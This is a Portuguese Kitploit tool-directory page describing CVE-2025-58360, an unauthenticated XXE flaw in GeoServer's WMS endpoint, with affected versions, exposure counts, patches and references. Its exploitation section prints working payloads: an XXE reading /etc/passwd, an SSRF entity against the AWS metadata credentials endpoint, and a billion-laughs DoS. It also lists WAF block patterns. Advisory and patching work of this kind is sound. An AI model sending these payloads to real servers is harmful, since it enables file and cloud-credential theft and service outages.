Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Blackash-CVE-2025-58360 — CVE-2025-58360 | Kitploit
Ferramentas/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

Ver Repositório
há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔓 🛰️ 'CVE-2025-58360' Endpoint WMS do GeoServer Vulnerável a Ataque XXE 🌟

GeoServer

🏷️ Informações Básicas

  • ID do CVE: CVE-2025-58360
  • Publicado: 📅 25 de novembro de 2025
  • Última Modificação: 📅 25 de novembro de 2025 (ainda recente em 26 de novembro)
  • Tipo de Vulnerabilidade: XML External Entity (XXE) – CWE-611
  • Software Afetado: GeoServer (servidor geoespacial de código aberto escrito em Java)
  • Gravidade: 🔥 Alta – Pontuação Base CVSS v3.1 7.5
    • Vetor: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • Exploração na Natureza: 🟡 Ainda não observada (26 de novembro de 2025) – mas PoCs públicos estão circulando
  • Autenticação Necessária: ❌ Nenhuma – totalmente não autenticado
  • Interação do Usuário Necessária: ❌ Nenhuma

🎨 O Que Torna Essa Falha Especial (e Perigosa)

Este é um XXE clássico, porém devastador, no endpoint GetMap do Web Map Service (WMS).
Atacantes podem:

  • 📂 Ler qualquer arquivo ao qual o processo do GeoServer tenha acesso (, , chaves privadas, etc.)
Baixar ferramenta
/etc/passwd
geoserver.xml
  • 🌐 Realizar Server-Side Request Forgery (SSRF) para varrer redes internas ou acessar endpoints de metadados (ex.: AWS/GCP)
  • 💣 Disparar Denial-of-Service com ataques de expansão de entidades ("billion laughs")
  • 🔗 Potencialmente encadear com outras falhas para RCE completo (não direto, mas possível em configurações incorretas)
  • 🛡️ Versões Afetadas (Tabela Detalhada)

    ComponenteVersões VulneráveisCorrigido EmStatus
    GeoServer Standalone2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.3, 2.25.6, 2.27.0🔴 Vulnerável
    Docker (osgeo/geoserver)2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.27.0🔴 Vulnerável
    Maven org.geoserver:gs-wms2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.25.6🔴 Vulnerável
    Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.25.6🔴 Vulnerável
    GeoServer 2.27.x e versões mais recentes–Já corrigido✅ Seguro

    🌍 Exposição Global (em tempo real até 26 de novembro de 2025)

    FonteInstâncias ExpostasNotas
    ZoomEye~49.400Busca app:"GeoServer"
    FOFA~24.000Resultados do último ano
    Shodan~31.000Porta 8080 + correspondência de título
    GobySec~20.000Varredura de rede pública

    → Isso representa dezenas de milhares de servidores potencialmente vulneráveis expostos na internet aberta agora mesmo! 🌐

    🧨 Passo a Passo Técnico Completo da Exploração

    Endpoint: POST /geoserver/wms
    Parâmetro-Chave: SLD_BODY (permite XML bruto de estilização)
    Caminho de Código Vulnerável: O parser XML não desativa a resolução de entidades externas → XXE clássico.

    f77f64d7c92fd31b29d537f5205da524

    Exemplo 1 – Divulgação de Arquivos (/etc/passwd)

    root@kitploit:~
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
      <sld:UserLayer>
        <sld:LayerFeatureConstraints>
          <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
        </sld:LayerFeatureConstraints>
      </sld:UserLayer>
    </sld:StyledLayerDescriptor>
    

    → A resposta contém o conteúdo de /etc/passwd 🎉

    Exemplo 2 – SSRF para Metadados Internos (exemplo AWS)

    root@kitploit:~
    <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
    

    → Vaza credenciais temporárias da AWS se estiver rodando em EC2.

    Exemplo 3 – DoS Billion Laughs

    root@kitploit:~
    <!DOCTYPE lolz [
      <!ENTITY lol "lol">
      <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
      <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
      <!-- repita até lol9 -->
    ]>
    <lol>&lol9;</lol>
    

    → Consome gigabytes de RAM em segundos 💥

    🛠️ Patches Oficiais e Downloads

    VersãoData de LançamentoLink de Download
    2.27.025 de novembro de 2025https://geoserver.org/release/stable/
    2.26.325 de novembro de 2025Patch do branch de manutenção
    2.25.625 de novembro de 2025Branch antigo suportado

    Usuários de Docker:

    root@kitploit:~
    docker pull osgeo/geoserver:2.27.0
    

    🔧 Workarounds (se você não puder corrigir imediatamente)

    1. Bloqueie XML perigoso com regra de WAF/mod_security:
      Negue requisições contendo <!ENTITY ou SYSTEM "file://
    2. Desative o parâmetro SLD_BODY globalmente (se não for necessário)
    3. Execute o GeoServer com sistema de arquivos somente leitura + remova capabilities
    4. Coloque atrás de um proxy reverso que remova corpos XML para usuários não autenticados

    📢 Referências Oficiais e PoCs

    • Entrada NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
    • Advisory do GeoServer: https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
    • Ticket JIRA: https://osgeo-org.atlassian.net/browse/GEOS-11682
    • PoC Público Seguro (Python): https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
    • Template Nuclei (detecção automática): Já mesclado no branch principal

    ⏰ Linha do Tempo

    DataEvento
    Antes de novembro de 2025Descoberto autonomamente pelo scanner de IA XBOW
    25 de novembro de 2025Divulgação coordenada → patches lançados
    25 de novembro de 2025CVE atribuído e publicado
    26 de novembro de 2025PoCs viralizam, varreduras de exposição disparam

    ✨ Palavras Finais

    Este é um XXE de manual que atinge uma plataforma geoespacial amplamente implantada, com dezenas de milhares de instâncias expostas à internet.
    Os patches foram lançados no mesmo dia da divulgação — parabéns à equipe do GeoServer pela agilidade! 🏆
    Mas a janela entre a disponibilidade do patch e a exploração em massa está diminuindo rapidamente.

    Se você executa o GeoServer → atualize hoje.
    Não se torne a próxima manchete.

    Fique seguro, fique brilhante! 🛡️✨